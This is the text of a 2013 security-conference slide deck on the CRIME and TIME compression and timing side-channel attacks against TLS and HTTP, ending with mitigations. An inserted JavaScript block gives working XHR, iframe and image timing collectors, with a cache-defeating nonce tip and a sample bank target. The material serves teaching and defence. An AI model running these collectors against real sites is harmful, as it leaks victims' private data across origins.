Timing Info-leak Made Easy
Presenter: Quan Minh Tam
Outline
• Review SSL/TLS weaknesses
• BEAST is not beast
• CRIME is not crime
– Compression
– CRIME
• TIME is time
– CRIME+
10/22/2013 11:32 PM www.securitybootcamp.vn
Cryptanalysis
• Chosen plaintext | ciphertext
• Adaptive chosen plaintext | ciphertext
• Side channel attack
• Bruteforce attack
• Meet-in-the-middle
• Linear | differential attack
• Birthday
Timeline
• BEAST - 2011
• CRIME - 2012
• BREACH - 2013
• LUCKY 13 - 2013
• TIME - 2013
• RC4 biases in TLS
CRIME
• Compression Ratio Info-leak Made Easy
• Chosen plaintext attack
COMPRESSION
Figure source: http://www.c-sharpcorner.com/uploadfile/shivprasadk/best-practice-no-4-improve-bandwidth-performance-of-asp-net-sites-using-iis-compression/
• Gzip/Deflate
• HTTP response body
• HTTP request body
• Header compression (this is what compresses the cookie, so it is what CRIME exploits)
– SSL/TLS compression
• Servers: OpenSSL, others
• Clients: Chrome
– SPDY
• Server: Apache mod_spdy
• Clients: all except IE
CRIME demo
How can you become a victim of CRIME?
• 1st requirement: the attacker can sniff your network traffic.
– You share a (W)LAN.
– He's hacked your home router.
– He's your network admin, ISP or government.
Source: https://docs.google.com/presentation/d/11eBmGiHbYcHR9gL5nDyZChu_-lCa2GizeuOfaLU2HOU/edit#slide=id.g1d134dff_0_165
How can you become a victim of CRIME?
• 2nd requirement: you visit evil.com.
– You click on a link.
– Or you surf a non-HTTPS site.
Source: https://docs.google.com/presentation/d/11eBmGiHbYcHR9gL5nDyZChu_-lCa2GizeuOfaLU2HOU/edit#slide=id.g1e3070b2_1_21
TIME
Review
• Round-Trip Time (RTT)
• Maximum Transmission Unit (MTU)
• Maximum Segment Size (MSS)
MSS = MTU - sizeof(TCPHDR) - sizeof(IPHDR)
• TCP sliding window
Source: http://ulam2.cs.luc.edu/ebook/html/slidingwindows.html
TIME
• Timing Info-leak Made Easy
• Chosen Plaintext Attack
• Targets compression and timing information leakage
• HTTP request
– CRIME on the request to extract cookie data
• HTTP response
– Extended CRIME to extract response data
– Access a resource behind authentication to detect whether the user is logged in
– Application specific: e.g. the number of digits in a bank account balance
HTTP payload
• The size of an HTTP payload may carry sensitive information
– Detecting differences in payload size is enough to extract it
• Timing measurements let the attacker distinguish payload sizes
• These timing measurements can be done with JavaScript on the attacker's site
XHR POC
• Create the HTTP request with XHR
– XHR adheres to the same-origin policy
• Cross-origin GET requests are still sent
– If the response headers allow it, the response is shown
– If not, the browser aborts and discards the response
• We don't care about the response
– The timing leaks the request size
• Use getTime() on XHR events
– onreadystatechange
• Noise elimination
– Repeat the process (say 10 times) and keep the minimal time
• HTML with JavaScript; the sending method is XHR
• Sends two requests that differ by one byte, alternating, 10 times each
– The longer request crosses the send window boundary
– The shorter one fits exactly within it
• Measures each request's time
• Outputs length and time
• Outputs the minimal timing value for each of the two request lengths
XHR
Real world 1
• Iframe
• Use getTime() on iframe events
– onload
– onreadystatechange (IE)
Real world 2
• HTTP request with IMG src
– It is not an image? Don't worry
– X-Frame-Options? Don't worry
• Use getTime() on img events
– onload
– onreadystatechange (IE)
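The three collectors from the XHR POC and the two "real world" variants, as an added example (not the presenter's code): each one makes the victim's browser fetch an attacker-chosen URL of the target origin and only records when the element's event fires; the response body is never read, so the same-origin policy is not violated and, for the IMG route, neither a non-image body nor X-Frame-Options gets in the way. The clock is injectable so the minimum-of-N logic can be exercised outside a browser; the target URL is an assumption. One practical caveat the slides do not spell out: repeating the same URL may be answered from the browser cache, so the URL builder should vary a fixed-width nonce per repetition to keep the request size constant while defeating the cache.

```javascript
'use strict';

// Time one load. `attach(fire)` starts the request and calls `fire` from the
// element's event; `done` receives the elapsed milliseconds.
function timeLoad(attach, done, now = Date.now) {
  const t0 = now();
  attach(() => done(now() - t0));
}

// XHR: the cross-origin GET is sent; SOP only stops the page from reading the body.
function viaXhr(url) {
  return fire => {
    const xhr = new XMLHttpRequest();
    xhr.onreadystatechange = () => { if (xhr.readyState === 4) fire(); };
    xhr.open('GET', url, true);
    xhr.send();
  };
}

// Iframe: onload fires for any document, including error pages.
function viaIframe(url) {
  return fire => {
    const frame = document.createElement('iframe');
    frame.style.display = 'none';
    frame.onload = () => { fire(); frame.remove(); };
    document.body.appendChild(frame);
    frame.src = url;
  };
}

// IMG: when the body is not an image the browser still downloads it and then
// fires onerror; X-Frame-Options is not consulted for images.
function viaImg(url) {
  return fire => {
    const img = new Image();
    img.onload = img.onerror = () => fire();
    img.src = url;
  };
}

// Repeat sequentially and keep the minimum (the slides' noise-elimination step).
// `urlFor(i)` builds the URL for repetition i so a same-length nonce can be varied.
function minLoadTime(collector, urlFor, reps, done, now = Date.now) {
  let best = Infinity, left = reps;
  (function next() {
    if (left === 0) return done(best);
    left -= 1;
    timeLoad(collector(urlFor(reps - left - 1)), t => { if (t < best) best = t; next(); }, now);
  })();
}

// Fixed-width nonce so every repetition has the same request length.
function nonceUrl(base, width) {
  return i => base + String(i).padStart(width, '0');
}

// Browser usage (assumed target URL, not from the slides):
// minLoadTime(viaImg, nonceUrl('https://bank.example/account?pad=', 4), 10, ms => report(ms));
```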
New Risk?
• Automation attack
– via URL
– via load time
• SOP?
– data leaked out
MITIGATIONS
• Adding random timing delays
• X-Frame-Options
• Unknown parameter
• CAPTCHA, CSRF token

MITIGATIONS
• Adding random timing delays: ineffective. The attacker keeps the minimum over repeated measurements, and a random additive delay is exactly what that step removes.
MITIGATIONS
• X-Frame-Options
– Browsers should support and respect the "X-Frame-Options" header for all content inclusion (not just IFRAME)
MITIGATIONS
• CSRF protection
• Unknown parameter
• CAPTCHA
That’s all